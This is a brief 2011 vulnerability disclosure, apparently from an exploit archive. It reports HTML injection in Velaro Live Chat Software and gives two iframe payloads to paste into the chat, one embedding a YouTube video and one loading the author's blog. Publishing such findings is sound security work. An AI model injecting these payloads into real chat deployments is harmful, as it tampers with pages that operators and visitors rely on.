# Exploit Title: Velaro Live Chat Software Cross Site Scripting
# Date: 29.08.2011
# Author: Sony
# Software Link: http://www.velaro.com/features/live-chat
# Version: all version
# POC:
http://st2tea.blogspot.com/2011/08/velaro-live-chat-software-cross-site.html

..................................................................

This is Html Code Injection in the Velaro Live Chat Software:

http://www.velaro.com/Portals/0/prechat-choose.html

Put our code in the  chat:

< iframe width="420" height="345" src="
http://www.youtube.com/embed/dzLbdsEV9iQ" frameborder="0"
allowfullscreen></iframe >

or

< iframe src="http://st2tea.blogspot.com/" >

Some pics:

http://i52.tinypic.com/7122hw.jpg

http://i55.tinypic.com/jaklsl.jpg